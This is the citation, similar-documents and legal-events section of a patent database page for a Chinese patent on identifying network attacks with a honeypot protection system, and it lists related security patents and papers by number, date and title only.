| CN112637150A (zh) * | 2020-12-10 | 2021-04-09 | 广东睿江云计算股份有限公司 | 一种基于nginx的蜜罐分析方法及其系统 |
| CN112637150B (zh) * | 2020-12-10 | 2023-06-02 | 广东睿江云计算股份有限公司 | 一种基于nginx的蜜罐分析方法及其系统 |
| CN112817833A (zh) * | 2021-01-20 | 2021-05-18 | 中国银联股份有限公司 | 一种监测数据库的方法及装置 |
| CN112995151A (zh) * | 2021-02-08 | 2021-06-18 | 腾讯科技(深圳)有限公司 | 访问行为处理方法和装置、存储介质及电子设备 |
| CN112995151B (zh) * | 2021-02-08 | 2023-11-14 | 腾讯科技(深圳)有限公司 | 访问行为处理方法和装置、存储介质及电子设备 |
| CN113162912A (zh) * | 2021-03-12 | 2021-07-23 | 中航智能建设(深圳)有限公司 | 基于大数据的网络安全保护方法、系统及存储设备 |
| CN115134098A (zh) * | 2021-03-12 | 2022-09-30 | 北京沃东天骏信息技术有限公司 | 一种黑客信息获取方法、装置、电子设备及存储介质 |
| CN115134098B (zh) * | 2021-03-12 | 2024-03-01 | 北京沃东天骏信息技术有限公司 | 一种黑客信息获取方法、装置、电子设备及存储介质 |
| CN114785555A (zh) * | 2022-03-25 | 2022-07-22 | 中国建设银行股份有限公司 | 一种应对DDoS攻击的防护方法及系统 |
Also Published As
| Publication number | Publication date |
|---|---|
| CN110995640B (zh) | 2022-04-05 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN110995640B (zh) | 识别网络攻击的方法及蜜罐防护系统 | |
| CN112383546B (zh) | 一种处理网络攻击行为的方法、相关设备及存储介质 | |
| CN109711171B (zh) | 软件漏洞的定位方法及装置、系统、存储介质、电子装置 | |
| US10657251B1 (en) | Multistage system and method for analyzing obfuscated content for malware | |
| US10225280B2 (en) | System and method for verifying and detecting malware | |
| CN105991595B (zh) | 网络安全防护方法及装置 | |
| Parampalli et al. | A practical mimicry attack against powerful system-call monitors | |
| US8196204B2 (en) | Active computer system defense technology | |
| CN113326514B (zh) | 网络资产的风险评估方法、装置、交换机、设备及服务器 | |
| KR20000054538A (ko) | 네트워크 침입탐지 시스템 및 방법 그리고 그 방법을기록한 컴퓨터로 읽을 수 있는 기록매체 | |
| Aoki et al. | Controlling malware http communications in dynamic analysis system using search engine | |
| CN108369541B (zh) | 用于安全威胁的威胁风险评分的系统和方法 | |
| CN112738071A (zh) | 一种攻击链拓扑的构建方法及装置 | |
| US20160110544A1 (en) | Disabling and initiating nodes based on security issue | |
| Mohammed et al. | Honeycyber: Automated signature generation for zero-day polymorphic worms | |
| US20080115215A1 (en) | Methods, systems, and computer program products for automatically identifying and validating the source of a malware infection of a computer system | |
| US8862730B1 (en) | Enabling NAC reassessment based on fingerprint change | |
| CN110602134B (zh) | 基于会话标签识别非法终端访问方法、装置及系统 | |
| US20040193923A1 (en) | Systems and methods for enterprise security with collaborative peer to peer architecture | |
| CN116319074B (zh) | 一种基于多源日志的失陷设备检测方法、装置及电子设备 | |
| Mohammadmoradi et al. | Making whitelisting-based defense work against badusb | |
| CN113328976B (zh) | 一种安全威胁事件识别方法、装置及设备 | |
| Hatada et al. | Finding new varieties of malware with the classification of network behavior | |
| Chowdhary et al. | Towards automatic learning of valid services for honeypots | |
| KR20110136170A (ko) | 해킹 툴을 탐지하는 방법, 서버 및 단말기 |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |